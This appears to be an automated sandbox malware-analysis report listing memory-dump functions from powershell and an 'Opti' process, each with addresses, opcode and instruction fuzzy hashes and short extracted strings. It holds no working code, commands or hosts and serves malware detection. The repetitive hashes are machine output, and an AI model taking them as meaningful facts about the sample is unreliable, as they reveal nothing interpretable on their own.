                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 555aab06627ab5e00e060ee60fd4867a2034d72f2152070bead75df71e804799
                                              • Instruction ID: b8143f3611183fe5d1dcb5fce946f65ab99a555af82ad6fcd91fd5f63224cc4c
                                              • Opcode Fuzzy Hash: 555aab06627ab5e00e060ee60fd4867a2034d72f2152070bead75df71e804799
                                              • Instruction Fuzzy Hash: B731867091CA4C9FDB1CDB5CD84A6A977E0FB99721F00421FE449D3251DB71A855CBC2
                                              Function 00007FFAACD840BF Relevance: .1, Instructions: 98COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2177075241.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a50607cc6fa16307ecb66c5e5f40a3b6bb2efcefc28ffc059fb335671b45aa9
                                              • Instruction ID: 11d2dea98e3e67febebcf3fc1f87d1032fc41401751825d10e35ef2e0e680efd
                                              • Opcode Fuzzy Hash: 3a50607cc6fa16307ecb66c5e5f40a3b6bb2efcefc28ffc059fb335671b45aa9
                                              • Instruction Fuzzy Hash: B821F773B0EA878FF3A5DB2844615746ED2EF52210B9980BAD16DC75D2DE28DD089381
                                              Function 00007FFAACCBA541 Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a16a12633e9abcf078f2cc1956f390875688cee4248804ad093c392f0b859aab
                                              • Instruction ID: da6469d60b82068f66b0600dff03a940e8cb5e812fcf87a9ad303a725aab2e6a
                                              • Opcode Fuzzy Hash: a16a12633e9abcf078f2cc1956f390875688cee4248804ad093c392f0b859aab
                                              • Instruction Fuzzy Hash: 2D21A571908A0C8FEB58DF9CD84A7FA7BE0EB99321F00812FD44DD3115D670A459CB91
                                              Function 00007FFAACCBA525 Relevance: .1, Instructions: 67COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e1d8a6026dad2a4bad8b50a648e4cf58044c624e88979ee0bece2fc1975dd30
                                              • Instruction ID: 94acf1b4fc1e73e3faccd56893d5de64ea9683670a3f769457df7d51a7910b3c
                                              • Opcode Fuzzy Hash: 6e1d8a6026dad2a4bad8b50a648e4cf58044c624e88979ee0bece2fc1975dd30
                                              • Instruction Fuzzy Hash: 7511043190CB888FDB45DF9C98493E9BBF0EB66321F0481ABC44CDB162D674A549CB92
                                              Function 00007FFAACD843BC Relevance: .1, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2177075241.00007FFAACD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaacd80000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 41b5b739e7ddf63a07e9c7dc0be3d0bb9759ef4d83beeb8d110a2b9af301c150
                                              • Instruction ID: 1f33532e70e7f7cae3bd79c9df05a35da22c7330a75f62e9812d193a6f016df1
                                              • Opcode Fuzzy Hash: 41b5b739e7ddf63a07e9c7dc0be3d0bb9759ef4d83beeb8d110a2b9af301c150
                                              • Instruction Fuzzy Hash: 94110672A0F6458FF7A5D73C84A49B47BD1EF4122074940BAD16DC7593DE18ED088381
                                              Function 00007FFAACCB33B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction ID: e2b619141ef1fcec1be8a3c7fe6995b56e1b19d1a77c61dd063c573ac02f6c0a
                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                              • Instruction Fuzzy Hash: 7F01847010CB088FD744EF0CE051AA6B3E0FF89320F10052DE58AC3661DA22E882CB41
                                              Function 00007FFAACCBA0FB Relevance: .0, Instructions: 42COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a00bc7e112ada56f09dc3da947fe84f2ed1eee37167b22ade0583433f191d0e9
                                              • Instruction ID: 708e992d9b46302ac8105bdd7e1baec89fb88af5ac10e8f2db4a71bae938f21f
                                              • Opcode Fuzzy Hash: a00bc7e112ada56f09dc3da947fe84f2ed1eee37167b22ade0583433f191d0e9
                                              • Instruction Fuzzy Hash: EBF0F676559B88CFD785DF5CA8650E97F90EF66211B0401A7E18CC7162DA21884887D1

                                              Non-executed Functions

                                              Function 00007FFAACCB0845 Relevance: 8.8, Strings: 7, Instructions: 96COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (08$8,8$H18$P/8$p08$-8$/8
                                              • API String ID: 0-1267371562
                                              • Opcode ID: 7fc6df306f2e05218c335f4ce410b809ca12b17c1cb8c819258e478d54cee872
                                              • Instruction ID: 9ba39b1219890fa6e292b9c0af9283f3d60994807d9c269bfb96db825e845da2
                                              • Opcode Fuzzy Hash: 7fc6df306f2e05218c335f4ce410b809ca12b17c1cb8c819258e478d54cee872
                                              • Instruction Fuzzy Hash: 4231ABC784FBC05FF2165BEA18161656E90EF53A00348C0FFE0CC4B5ABA85A8A0DC7C6
                                              Function 00007FFAACCB896C Relevance: 6.4, Strings: 5, Instructions: 155COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^$N_^$N_^$N_^$N_^
                                              • API String ID: 0-2528851458
                                              • Opcode ID: f965045a09ff7c34f28e0302e3101eddf7e12a39c9e6c0c6d19135672a36e40c
                                              • Instruction ID: 32f05c5053d9e4bdaff71b92b447254e1c4c7e09a14e41bcb2c4ef7550f303ac
                                              • Opcode Fuzzy Hash: f965045a09ff7c34f28e0302e3101eddf7e12a39c9e6c0c6d19135672a36e40c
                                              • Instruction Fuzzy Hash: 72419393D0F7C38BF75A479A4C790A16FD0EF6325570D42E6C1988B493ED186A4B8382
                                              Function 00007FFAACCB8BFA Relevance: 6.3, Strings: 5, Instructions: 91COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^5$N_^8$N_^F$N_^I$N_^K
                                              • API String ID: 0-759930175
                                              • Opcode ID: 61277c2efa12210fc9e80e4083bcfcb4b1a8ec1a5abbb06f509938720e162bba
                                              • Instruction ID: 3fa02eebaf7beba508b2bf9de6d9e4dc393c93b5291fdbb85a5c591e48238003
                                              • Opcode Fuzzy Hash: 61277c2efa12210fc9e80e4083bcfcb4b1a8ec1a5abbb06f509938720e162bba
                                              • Instruction Fuzzy Hash: 2121F2F7B141264E93017BBDAC659E87B84DF9427534942F2D29CCF603DE14608A8AC6
                                              Function 00007FFAACCB89F3 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.2175764894.00007FFAACCB5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB5000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_7ffaaccb5000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: N_^$N_^$N_^$N_^
                                              • API String ID: 0-3900292545
                                              • Opcode ID: 829feab63559170ecb4eb4e4a5abe52567d216d3d4844a4aa6b6a07685e47e2a
                                              • Instruction ID: d6cf3dc19af1410c6210fb54e8d93e1a14ad91ffe3815f5c880c595ea8eef28c
                                              • Opcode Fuzzy Hash: 829feab63559170ecb4eb4e4a5abe52567d216d3d4844a4aa6b6a07685e47e2a
                                              • Instruction Fuzzy Hash: 1A31D6D3A0FBC38BF75A47994C760A16FD0EF6321870D42F5C1988B583ED146A4B42C2

                                              Executed Functions

                                              Function 00007FFAACCC0E10 Relevance: 4.6, Strings: 3, Instructions: 834COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 5f6c29ca3ca5c78eb9c44ad24fab08b8620a408efd245d4c2f10ffccc9afa62d
                                              • Instruction ID: 9a7bc29e134167f21728f1bfaa21045d3a8a34fff76dd8045d0e8a07c090a325
                                              • Opcode Fuzzy Hash: 5f6c29ca3ca5c78eb9c44ad24fab08b8620a408efd245d4c2f10ffccc9afa62d
                                              • Instruction Fuzzy Hash: 303236A2A1CA564FE755FB7DD459AF97BD1EF89320B4844BAE04DC71C3CE28A80583C1
                                              Function 00007FFAACCC0FE2 Relevance: 4.3, Strings: 3, Instructions: 592COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 348a4b5b42292e7bef7cb1f1b06ccf1c290a4e27fb0fee71f96bfd41d06d9562
                                              • Instruction ID: b77efda339e3281e2b73e7f0c53377800a516a75caab14f2cd86e24ea1bbdc85
                                              • Opcode Fuzzy Hash: 348a4b5b42292e7bef7cb1f1b06ccf1c290a4e27fb0fee71f96bfd41d06d9562
                                              • Instruction Fuzzy Hash: 28F1E2A1A1DA568FF795FB7CD459AF96BD1EF89310B4444B9E04EC32D3CE28A80583C1
                                              Function 00007FFAACCC1068 Relevance: 4.3, Strings: 3, Instructions: 533COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: d8f839aeebb0b5212509d8caf2cd2afad3db11cd1525072df0a819d252cddaa6
                                              • Instruction ID: 4fe85797b04ac67bde74aee3a742fa62b8818b63e459681dfad38d7f7eb522ee
                                              • Opcode Fuzzy Hash: d8f839aeebb0b5212509d8caf2cd2afad3db11cd1525072df0a819d252cddaa6
                                              • Instruction Fuzzy Hash: EFD1C3A1A2DA458FE795FB7CD059AF967E2EF89310B4444B9D44EC32D3DE28EC058381
                                              Function 00007FFAACCC10D0 Relevance: 4.3, Strings: 3, Instructions: 514COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 8dc7be31fbf127e7209ea6dad4d4886f6645017a91475691447488e8cc34d902
                                              • Instruction ID: 2c1e64268bb9330679b61c92d5bc24db8845fbd3f504080b38d41566ebd2c6bb
                                              • Opcode Fuzzy Hash: 8dc7be31fbf127e7209ea6dad4d4886f6645017a91475691447488e8cc34d902
                                              • Instruction Fuzzy Hash: 0FD183A1A2DA458FE795EB7CC459BB966E2EF89300B4444B9D40EC32D7DE28EC058781
                                              Function 00007FFAACCC0985 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HB%
                                              • API String ID: 0-81579929
                                              • Opcode ID: 95933a301462c6915e8f65250e53c6067f769a783baad0c0e1ce52c9eaeba7eb
                                              • Instruction ID: c1ab94421a114c76baf72a79677c393e392ec8b73cb9ce4a345be0fb66437370
                                              • Opcode Fuzzy Hash: 95933a301462c6915e8f65250e53c6067f769a783baad0c0e1ce52c9eaeba7eb
                                              • Instruction Fuzzy Hash: 17316EB1A18A098FEB45EBB8C4657FDB7A1FF98301F5045B9D00DD7282DE38A8458780
                                              Function 00007FFAACCC1931 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8e%
                                              • API String ID: 0-1390493536
                                              • Opcode ID: ff326ef0e9a7142ead01c1f37551c32d2390fb2a751b0ac2eb28083292f5c7a7
                                              • Instruction ID: 93e232810247cd46d908a4b292a13470934fb0efc637d9d61c34698045eb21fb
                                              • Opcode Fuzzy Hash: ff326ef0e9a7142ead01c1f37551c32d2390fb2a751b0ac2eb28083292f5c7a7
                                              • Instruction Fuzzy Hash: DD01A25590E7918FF797AB3958514B1BFF09F9B214B0844AEE4CDC7093E918ED498382
                                              Function 00007FFAACCC0C3E Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f83ce019308bb6858267ec105f2da659513bb7695afbeaef8dc4dff346dc497
                                              • Instruction ID: 35a07bc11cb07779c97a4e01baca3ee3cd724fb565e1ad54f6c04eaf173fdd5c
                                              • Opcode Fuzzy Hash: 7f83ce019308bb6858267ec105f2da659513bb7695afbeaef8dc4dff346dc497
                                              • Instruction Fuzzy Hash: A0511561A0E7864FE757AB38C8666753BE5EF87210B0940FAD08DC7293DD1C9C468392
                                              Function 00007FFAACCC179E Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fd24e3ab60ff66f73f8fd186d05d9dfa148c1199331dfda37050a176f3b889a0
                                              • Instruction ID: e66f124bc21098d98732f515fcb80ac88d9488b76cfc1c7ebca226b6c4642ff7
                                              • Opcode Fuzzy Hash: fd24e3ab60ff66f73f8fd186d05d9dfa148c1199331dfda37050a176f3b889a0
                                              • Instruction Fuzzy Hash: AA51E45170DAC50FE786AB7898696A57FD2DF8A220B0941FFE08DC72A3DD5C8C468341
                                              Function 00007FFAACCC0558 Relevance: .1, Instructions: 138COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 524a112a476e027fbe0b02e55e62a372ecf31c06208003684a15c2ce4d4a3f62
                                              • Instruction ID: e206214bcab0efcd16fd2c47cfffc7dbcd838e72bf32f06a6677fa3064abb449
                                              • Opcode Fuzzy Hash: 524a112a476e027fbe0b02e55e62a372ecf31c06208003684a15c2ce4d4a3f62
                                              • Instruction Fuzzy Hash: 5031E761B1C9484FE788EB3CD45A7B9A6C2EF9D351F0545BEE04EC3293DE689C428381
                                              Function 00007FFAACCC0AD1 Relevance: .1, Instructions: 130COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a5f1f9b79bfd7207d07e8c46aa400f4a336e7b8a7f94b8e5aa6698ff4833830
                                              • Instruction ID: 956853a650a41a1363928c14fc9f6f830a29036d76314cd0ed4bbd94af97d292
                                              • Opcode Fuzzy Hash: 7a5f1f9b79bfd7207d07e8c46aa400f4a336e7b8a7f94b8e5aa6698ff4833830
                                              • Instruction Fuzzy Hash: 5131C7A1B1CA465FF745BBBC88597BD77D1EF99311F0442BAE00DC3293DE2898418381
                                              Function 00007FFAACCC0855 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7fe57e4c889bd7cef6b71ddc74fb0db9ac5a374bb17fb754d13b9edc96afd2c6
                                              • Instruction ID: 6162cca123c5d85f4f981e9ca1badc151c38eda0f7607c685d0ea28857ba6b4e
                                              • Opcode Fuzzy Hash: 7fe57e4c889bd7cef6b71ddc74fb0db9ac5a374bb17fb754d13b9edc96afd2c6
                                              • Instruction Fuzzy Hash: D131C4A1A9D7494FD341EB3C84969B9BF71BF8D205B8080E9D40DCB397DE24990087D2

                                              Non-executed Functions

                                              Function 00007FFAACCC06FA Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001B.00000002.2225735002.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_27_2_7ffaaccc0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: <N_^$=N_^$N_^j$N_^p
                                              • API String ID: 0-2936155160
                                              • Opcode ID: e982156c458302efc85956df776a8ad10dbd4d0608dff929efaf5a271c4c3a32
                                              • Instruction ID: c102d8e5e94654f6352570593cc268c36f04647d2ea700e3aed02d0a1f8fb8ce
                                              • Opcode Fuzzy Hash: e982156c458302efc85956df776a8ad10dbd4d0608dff929efaf5a271c4c3a32
                                              • Instruction Fuzzy Hash: 49312BE7A4E5269EF30337BCA8555F82FC09F41374B188476C29CCA183CE54A04E87D6

                                              Executed Functions

                                              Function 00007FFAACCD0E10 Relevance: 4.6, Strings: 3, Instructions: 828COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 56c30106d53bc3a09aa1320b5c2828dc304a558cc4eb2c8bfc8b3e08103c932e
                                              • Instruction ID: 5783a289f68b3bd271898e394af5f85893208c0dfac25f47e9aee757bcbd46fd
                                              • Opcode Fuzzy Hash: 56c30106d53bc3a09aa1320b5c2828dc304a558cc4eb2c8bfc8b3e08103c932e
                                              • Instruction Fuzzy Hash: 543235A2A2895A8FE751FB7CE459BF97BD1EF85320B4441FAE04DC71C3DE18A8058781
                                              Function 00007FFAACCD0FE2 Relevance: 4.3, Strings: 3, Instructions: 582COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 9e9eb16f184ee253107f351bf965f7a0d7afa944e649970a8696536bca4020c9
                                              • Instruction ID: 6a3eb17b57368896d8a6df937d7a95ed835d6f8da0405895747413ac3f902456
                                              • Opcode Fuzzy Hash: 9e9eb16f184ee253107f351bf965f7a0d7afa944e649970a8696536bca4020c9
                                              • Instruction Fuzzy Hash: 60F1E4A1A2994A8FF795FB7C90597FC77D1EF49320B4441BAE04EC31D3DE28A8058781
                                              Function 00007FFAACCD1068 Relevance: 4.3, Strings: 3, Instructions: 527COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 595e477d2249084ad4b4fa244ae64620fc03b8ffb7196085a88e0cfb1375e505
                                              • Instruction ID: 2031128e26036a6be11e58dff5e5a68e81e9f0b5ed526cbea98420b8047d697b
                                              • Opcode Fuzzy Hash: 595e477d2249084ad4b4fa244ae64620fc03b8ffb7196085a88e0cfb1375e505
                                              • Instruction Fuzzy Hash: 58D1D461A2994A8FE795FB7C9059BB877D2FF89310F4445B9E04EC32D3DE28E8058781
                                              Function 00007FFAACCD10D0 Relevance: 4.3, Strings: 3, Instructions: 516COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0D%$0D%$0D%
                                              • API String ID: 0-670418320
                                              • Opcode ID: 933ee9d59be3dcc2c012e2b5d7251f199e3447675cb06115a7fd274642fcdcda
                                              • Instruction ID: 68eaae8ccfc1e4fd3685f24679047095bc6b74b14e7f2dbe903544af926a73ff
                                              • Opcode Fuzzy Hash: 933ee9d59be3dcc2c012e2b5d7251f199e3447675cb06115a7fd274642fcdcda
                                              • Instruction Fuzzy Hash: D9D1C661A29A498FE795FB7C80597B877D2FF89310F8445B9E44EC32D3DE28E8058781
                                              Function 00007FFAACCD0985 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HB%
                                              • API String ID: 0-81579929
                                              • Opcode ID: 34f064e5cb57b0afe443c2fff1c11c0ef029cf73e935cd137a7046f2477acc97
                                              • Instruction ID: 1ad05c5e7826073a9f9cb1dfbe4985beac3d236a8a8b0d4f7b744058b13cf30b
                                              • Opcode Fuzzy Hash: 34f064e5cb57b0afe443c2fff1c11c0ef029cf73e935cd137a7046f2477acc97
                                              • Instruction Fuzzy Hash: 38318DB0A28A4D8FEB44EBB8D4657E9B7E1FF98301F5445B9D00DD3282CE39A8458780
                                              Function 00007FFAACCD1931 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8e%
                                              • API String ID: 0-1390493536
                                              • Opcode ID: d3e639410338720389ae16f4cc27d8a9b567c29ce2afb36fb02db466a2cd701f
                                              • Instruction ID: c3e3725a57adf03ac7b5d0943a9a83c2fcddd2fcc36bfd11028aab14683fad36
                                              • Opcode Fuzzy Hash: d3e639410338720389ae16f4cc27d8a9b567c29ce2afb36fb02db466a2cd701f
                                              • Instruction Fuzzy Hash: 0501264190EB858FF786AB385851571BFF0DF96220B0804BFE4CDC30D7E918E9488382
                                              Function 00007FFAACCD0C3E Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d64e1346613bdc64de7db83816c8adace1470644a0defc3d7f0b187b540398d6
                                              • Instruction ID: 829a15b4a6c8c0dc36b498ee3d4537405a2dc7494c10b6e2645c2cc2b7b5020c
                                              • Opcode Fuzzy Hash: d64e1346613bdc64de7db83816c8adace1470644a0defc3d7f0b187b540398d6
                                              • Instruction Fuzzy Hash: B3513621A0EA864FE357AB3CD8656753BE5EF87210B0940FBD08DC7293CD1C9C468352
                                              Function 00007FFAACCD179E Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001C.00000002.2346969804.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_28_2_7ffaaccd0000_Opti.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 59db2b9e0c545bc3a3a8acf34c58789820a7906f86d3a9d4fc6acdbc47672f00
